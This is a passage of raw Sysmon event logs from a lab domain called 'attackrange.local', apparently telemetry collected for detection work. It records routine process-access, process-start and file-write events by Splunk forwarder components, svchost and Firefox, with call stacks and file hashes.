Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.713{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.556{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4833EA82918A4A742F3C7202CAD817E3,SHA256=19B7A629FDA6A1B5814D26C5C1C8D770FF54C79F5DC2EB38FCDDB7A6A935FC2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:25.201{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=7B12963036AF60B7573E9578151B5E0A,SHA256=935A96DB9B5B887C5739DC57312FA38A1FBC31E83C339E545514B017AFB6ED69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:25.001{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07D2273E29FBFBA898992B6A0FC7E457,SHA256=7C0FAE37C59D846EB216F02CEF8354BEE11A60A2D852604E8C08721C41908CFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CE07D3D07248F27564C05BF4FA0DD83,SHA256=C220CDE339505C39CF2266D11F5DEBD942FBB8CEDED31F578A5799E315E11D8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F0DE248AB634C0E3816254076BD28E3,SHA256=1E04915CF7A297560B239861BDA3B1FF8B8EF54BD2ECC51981D742F7FA61803A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.040{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.025{0C1E0330-F699-60EB-AC79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 